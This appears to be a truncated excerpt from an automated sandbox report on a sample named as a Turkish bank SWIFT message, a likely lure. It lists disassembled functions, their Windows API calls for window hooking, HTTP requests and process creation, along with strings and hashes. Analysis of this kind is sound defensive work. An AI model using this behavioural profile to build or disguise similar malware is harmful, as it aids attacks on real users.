Part of subcall function 000C172B: __woutput_l.LIBCMT ref: 000C1784

FindResourceW.KERNEL32(?,?,0000000E), ref: 000E6834
LoadResource.KERNEL32(?,00000000), ref: 000E6840
LockResource.KERNEL32(00000000), ref: 000E684D
FindResourceW.KERNEL32(?,?,00000003), ref: 000E686D
LoadResource.KERNEL32(?,00000000), ref: 000E687F
SizeofResource.KERNEL32(?,00000000), ref: 000E688E
LockResource.KERNEL32(?), ref: 000E689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 000E68F9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: a1519780e3666a6eac002f97f8adba00ee2c2ab2067674e2ed745c270f5c720b
Instruction ID: 0872f43a6c0a23d3c1e195bd3db4fc65997008e56297b29505a066aef6d1d024
Opcode Fuzzy Hash: a1519780e3666a6eac002f97f8adba00ee2c2ab2067674e2ed745c270f5c720b
Instruction Fuzzy Hash: 5331AE7190025AFFDB109F61EE58EBE7BACEF18380B008525F902E2151EB71D962DB70

Function 000E4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000E4047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,000E30A5,?,00000001), ref: 000E405B
GetWindowThreadProcessId.USER32(00000000), ref: 000E4062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000E30A5,?,00000001), ref: 000E4071
GetWindowThreadProcessId.USER32(?,00000000), ref: 000E4083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000E30A5,?,00000001), ref: 000E409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000E30A5,?,00000001), ref: 000E40AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000E30A5,?,00000001), ref: 000E40F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000E30A5,?,00000001), ref: 000E4108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000E30A5,?,00000001), ref: 000E4113

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 3545c990a4219c979947da22cef3d19ce6b14cc2b0f7b20ca86dbb4dc33bcede
Instruction ID: d3a49db75010b87027c18be7899dccf1ae0c423238829f920f7c7dcb41853a0a
Opcode Fuzzy Hash: 3545c990a4219c979947da22cef3d19ce6b14cc2b0f7b20ca86dbb4dc33bcede
Instruction Fuzzy Hash: A1319E71900244BFDB20DF56EC8AB6977EAEB64351F10801AFA14E6690CBB4DEC08B60

Function 00110133 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

GetSystemMetrics.USER32(0000000F), ref: 0011016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0011038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001103AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 001103D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001103FF
ShowWindow.USER32(00000003,00000000), ref: 00110421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00110440

Strings

@U=u, xrefs: 001103AB, 001103FF

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID: @U=u
API String ID: 3356174886-2594219639
Opcode ID: 5ba5bc0d25529809685ecffa8accc83c7f41830a26f6ed825dbadcfca1b7df49
Instruction ID: d18a865bb6d95adf6a61b1df3952f3bdd759b62ec2d169f0ac651350416cb692
Opcode Fuzzy Hash: 5ba5bc0d25529809685ecffa8accc83c7f41830a26f6ed825dbadcfca1b7df49
Instruction Fuzzy Hash: 7AA1AC35A00616EFDB1DCF68C9897EDBBB1BB08740F158125EC54A7294D7B4ADE0CB90

Function 000DCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,000DCF50), ref: 000DCE90

Strings

REGEXPCLASS, xrefs: 000DCC56
TEXT, xrefs: 000DCDC7
CLASSNN, xrefs: 000DCC33
CLASS, xrefs: 000DCC10
INSTANCE, xrefs: 000DCD9E
NAME, xrefs: 000DCCC2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 8ea6dcbf03644ff383d7c22d1b470208412f4e8c808172717cc413185c80ba93
Instruction ID: 7bd67caf4cffc9c92f079bcfea616b7c5a97756f593d3a7ead8c62d4d475a928
Opcode Fuzzy Hash: 8ea6dcbf03644ff383d7c22d1b470208412f4e8c808172717cc413185c80ba93
Instruction Fuzzy Hash: 0991C371600307AAEB58DFA0C481FEEFBB5BF05300F54851AE959A7242DF30695ADBE0

Function 000A3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000A30DC
CoUninitialize.OLE32(?,00000000), ref: 000A3181
UnregisterHotKey.USER32(?), ref: 000A32A9
DestroyWindow.USER32(?), ref: 00115079
FreeLibrary.KERNEL32(?), ref: 001150F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00115125

Strings

close all, xrefs: 000A30D7

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 974aa9e9e23d0d6a53fd6e05862a46d3f7cabc4a02ee24cbdc99560d74d1636f
Instruction ID: cc453026ab0c97ffa37aadf358b7b177191465b176dcf2f983da5ff676608324
Opcode Fuzzy Hash: 974aa9e9e23d0d6a53fd6e05862a46d3f7cabc4a02ee24cbdc99560d74d1636f
Instruction Fuzzy Hash: C4912A34600202DFC719EF94D895FA9F3A4FF16304F5582A9F50AA7662DB30AE66CF50

Function 00109A75 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00109B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00109B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00109B47
_wcscat.LIBCMT ref: 00109BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00109BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00109BE7

Strings

@U=u, xrefs: 00109B19, 00109B2D
SysListView32, xrefs: 00109AEB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: @U=u$SysListView32
API String ID: 307300125-1908207174
Opcode ID: 6540f52535aeab52f9c7d1604d71ff125261e13e9e084742e8ed3309aff6d3f8
Instruction ID: 2ee9c5889336288d496781179fbf606b27b04bb87c91f2e52dffb38b18a2a62a
Opcode Fuzzy Hash: 6540f52535aeab52f9c7d1604d71ff125261e13e9e084742e8ed3309aff6d3f8
Instruction Fuzzy Hash: C541A271A00308EBEB219FA4DC85FEE77A8EF08350F10442AF585A72D2D7B59D85CB60

Function 000F45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000F45FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000F462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000F466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000F4682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000F468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000F46BF
InternetCloseHandle.WININET(00000000), ref: 000F4706

Part of subcall function 000F5052: GetLastError.KERNEL32(?,?,000F43CC,00000000,00000000,00000001), ref: 000F5067

Strings

, xrefs: 000F46B8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 8197c011c88672d18f9296d2e80583f1ccd0863791a76676d4d85741ebf21a69
Instruction ID: a0adead84ce40f64068642524db34bb25bb13de5b1e01c6214952f1da8cd748a
Opcode Fuzzy Hash: 8197c011c88672d18f9296d2e80583f1ccd0863791a76676d4d85741ebf21a69
Instruction Fuzzy Hash: C5418CB1500209BFEB119F50DC85FFB77ACEF09314F004026FA01DA542EBB49945ABA5

Function 00108FC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00108FE7
GetWindowLongW.USER32(00BDEA00,000000F0), ref: 0010901A
GetWindowLongW.USER32(00BDEA00,000000F0), ref: 0010904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00109081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001090AB
GetWindowLongW.USER32(00000000,000000F0), ref: 001090BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001090D6

Strings

@U=u, xrefs: 00108FE7, 00109081, 001090AB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: @U=u
API String ID: 2178440468-2594219639
Opcode ID: 1832d4e33e8eaa3b98ac5698a5fa8650caafa8deed9327ae286f108ca9a7f459
Instruction ID: 2b4959e9d1a60d0cd308b5b66a0a74b71ea22a82105eabbbf267aaaf4f3f458b
Opcode Fuzzy Hash: 1832d4e33e8eaa3b98ac5698a5fa8650caafa8deed9327ae286f108ca9a7f459
Instruction Fuzzy Hash: AA314834600215EFEB208F58DC94F6537AAFB49314F2841A4F5998B6F6CBF1A881CB80

Function 000FB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0013DC00), ref: 000FB715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0013DC00), ref: 000FB749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 000FB8C1
SysFreeString.OLEAUT32(?), ref: 000FB8EB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 237586967315594e932d1caad1f1a29e0c33f1d2b8056b428d7c7491c25dc759
Instruction ID: 3766bd6b82eed3a639667861af9e9529689055dea4f39b81ba87f70beddc6e8d
Opcode Fuzzy Hash: 237586967315594e932d1caad1f1a29e0c33f1d2b8056b428d7c7491c25dc759
Instruction Fuzzy Hash: 5CF12771A00209AFDB14DF94C884EBEBBB9FF89311F108458FA05AB251DB71AE46DF50

Function 001024D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001024F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00102688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001026AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001026EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0010270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0010286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001028A1
CloseHandle.KERNEL32(?), ref: 001028D0
CloseHandle.KERNEL32(?), ref: 00102947

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 9fcaff54f35f8067bfec66277ebfeb31398b06abe3281ba6ff56c23dcb7e27c9
Instruction ID: 51eba31565709e992c43d4061a2fe7b7eb1906850edbf42198ee6d15cdc47f34
Opcode Fuzzy Hash: 9fcaff54f35f8067bfec66277ebfeb31398b06abe3281ba6ff56c23dcb7e27c9
Instruction Fuzzy Hash: ABD19A31604201DFCB14EF24C895BAEBBE5BF85314F14846DF9899B2A2DB71EC45CB52

Function 000E7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000E6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000E5FA6,?), ref: 000E6ED8

Part of subcall function 000E6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000E5FA6,?), ref: 000E6EF1

Part of subcall function 000E72CB: GetFileAttributesW.KERNEL32(?,000E6019), ref: 000E72CC

lstrcmpiW.KERNEL32(?,?), ref: 000E75CA
_wcscmp.LIBCMT ref: 000E75E2
MoveFileW.KERNEL32(?,?), ref: 000E75FB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 6dbc2468073cbeb8b9f308fe7ae1840554ddc24fdb96e94c4d7b0aceba056ac9
Instruction ID: f053d01147a0e939e803a97fcebba73c68992e729f0163c01d28341358dde140
Opcode Fuzzy Hash: 6dbc2468073cbeb8b9f308fe7ae1840554ddc24fdb96e94c4d7b0aceba056ac9
Instruction Fuzzy Hash: C0513FB2A092599EDF64EB95DC81DDE73BC9F08310B1040AEF609E3542EA7497C9CF64

Function 000BEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0011DAD1,00000004,00000000,00000000), ref: 000BEAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0011DAD1,00000004,00000000,00000000), ref: 000BEB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0011DAD1,00000004,00000000,00000000), ref: 0011DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0011DAD1,00000004,00000000,00000000), ref: 0011DCF2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 29d42319e6e3236a3245b2dd7959d5dabbbd45f62168602773e9b85ca1c1451a
Instruction ID: 229bd19fc3954915cfecab428014f5febecba39c5ae9fdf2478376738f77c27b
Opcode Fuzzy Hash: 29d42319e6e3236a3245b2dd7959d5dabbbd45f62168602773e9b85ca1c1451a
Instruction Fuzzy Hash: 664107702046C0AAD7794B28ED8DFEF7ADABB51305F19081DE047869A2C7B0B8C0D751

Function 000DB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,000DAEF1,00000B00,?,?), ref: 000DB26C
HeapAlloc.KERNEL32(00000000,?,000DAEF1,00000B00,?,?), ref: 000DB273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000DAEF1,00000B00,?,?), ref: 000DB288
GetCurrentProcess.KERNEL32(?,00000000,?,000DAEF1,00000B00,?,?), ref: 000DB290
DuplicateHandle.KERNEL32(00000000,?,000DAEF1,00000B00,?,?), ref: 000DB293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,000DAEF1,00000B00,?,?), ref: 000DB2A3
GetCurrentProcess.KERNEL32(000DAEF1,00000000,?,000DAEF1,00000B00,?,?), ref: 000DB2AB
DuplicateHandle.KERNEL32(00000000,?,000DAEF1,00000B00,?,?), ref: 000DB2AE
CreateThread.KERNEL32(00000000,00000000,000DB2D4,00000000,00000000,00000000), ref: 000DB2C8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 595bf8e74896a4496df7bbcdfe123ce6d4db9b5150cf475a8ed7269b9ce5646c
Instruction ID: 98527fc8a33c85a14534126319a8118f2f59574e3962b1db5b0a91cc4ef33527
Opcode Fuzzy Hash: 595bf8e74896a4496df7bbcdfe123ce6d4db9b5150cf475a8ed7269b9ce5646c
Instruction Fuzzy Hash: 7701BBB5240304BFE720EBA5EC49F6B7BACEB88711F018411FA05DB6A1CA749851CB61

Function 000FC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 000FC49E
NULL Pointer assignment, xrefs: 000FC876, 000FC887

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 8e6fb5984387576602b62047eaf8d598153c8c1d014bb10698468ae64d195262
Instruction ID: 67ed5074ca98c7e667727f1edfd7288ae1e01b3125352cfc236fab8152bf6fa1
Opcode Fuzzy Hash: 8e6fb5984387576602b62047eaf8d598153c8c1d014bb10698468ae64d195262
Instruction Fuzzy Hash: 95E1C171A0021DAFEF14DFA4CA82EFE77F5EB48754F148029EA05AB681D770AD41DB90

Function 000FBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000FBB5C
VariantInit.OLEAUT32(?), ref: 000FBC2D
VariantInit.OLEAUT32(?), ref: 000FBD2E
VariantClear.OLEAUT32(?), ref: 000FBD38
VariantClear.OLEAUT32(?), ref: 000FBD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 000FBD11
Null Object assignment in FOR..IN loop, xrefs: 000FBBBD, 000FBCEB, 000FBDA7

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: b91bb1dc4db0d94fc0e9daa4e9d7f402b75c7179e24c9add829271201f2440aa
Instruction ID: 1d6b615cab54500bef97d6c5f88611b88f75a57783e774023f1db5278f986f3b
Opcode Fuzzy Hash: b91bb1dc4db0d94fc0e9daa4e9d7f402b75c7179e24c9add829271201f2440aa
Instruction Fuzzy Hash: AE91B071A00219EBCF20CF95D844FEEBBB8EF85710F10811AF615AB281D7709944CFA1

Function 0010172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

